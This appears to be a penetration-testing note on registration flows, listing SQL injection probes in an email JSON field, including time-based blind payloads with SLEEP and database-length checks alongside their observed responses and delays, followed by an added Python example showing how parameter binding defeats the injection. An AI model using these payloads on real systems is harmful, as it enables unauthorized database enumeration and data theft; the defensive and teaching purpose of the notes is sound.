Registration
Throwaway Email Services
Use a throwaway email service to create a temporary address:
- <https://mail.protonmail.com>

Check the registration process and try to find an IDOR or an endpoint that leaks usernames/emails.

# SQLI in Email Field
{"email":"asd'a@a.com"} --> Not Valid
{"email":"asd'or'1'='1@a.com" } --> valid
{"email":"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1@a.com"} --> Not Valid
{"email":"a'-IF(LENGTH(database())>9,SLEEP(7),0)or'1'='1@a.com"} --> Valid --> Delay: 7,854 ms
{"email":"\\"a'-IF(LENGTH(database())=10,SLEEP(7),0)or'1'='1\\"@a.com"} --> {"code":0,"status":200,"message":"Berhasil"} --> Valid --> Delay: 8,696 ms
{"email":"\\"a"-IF(LENGTH(database())=11,SLEEP(7),0)or'1'='1\\"@a.com"} --> {"code":0,"status":200,"message":"Berhasil"} --> Valid --> No delay
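
Why the first two probes above get different responses, and how a bound parameter removes that signal, shown as an added example (not code from these notes or from the referenced write-up). It uses SQLite in place of the target's database; the regex filter, table and accounts are constructed assumptions.

```python
import re
import sqlite3

# Loose syntax filter (assumed; the page does not show the target's real one).
EMAIL_RE = re.compile(r"^[^@\s]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def make_db():
    """In-memory table with constructed sample accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT PRIMARY KEY)")
    db.executemany("INSERT INTO users VALUES (?)",
                   [("alice@example.com",), ("bob@example.com",)])
    return db

def lookup_concat(db, email):
    """Vulnerable: the email is spliced into the SQL text."""
    if not EMAIL_RE.match(email):
        return "rejected"
    try:
        sql = "SELECT COUNT(*) FROM users WHERE email = '" + email + "'"
        return db.execute(sql).fetchone()[0]
    except sqlite3.OperationalError:
        return "sql-error"  # parser error: the input was read as SQL

def lookup_param(db, email):
    """Hardened: the email is bound as a parameter and stays data."""
    if not EMAIL_RE.match(email):
        return "rejected"
    return db.execute("SELECT COUNT(*) FROM users WHERE email = ?",
                      (email,)).fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    # The first two probe values from the notes, plus a known account.
    for email in ("alice@example.com", "asd'a@a.com", "asd'or'1'='1@a.com"):
        print(f"{email!r:24} concat={lookup_concat(db, email)!r:12} "
              f"param={lookup_param(db, email)!r}")
```

The unbalanced quote breaks the concatenated statement while the balanced one parses, which is the Not Valid / Valid difference recorded above; with the bound parameter both are ordinary non-matching strings.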
# Resources
- <https://dimazarno.medium.com/bypassing-email-filter-which-leads-to-sql-injection-e57bcbfc6b17>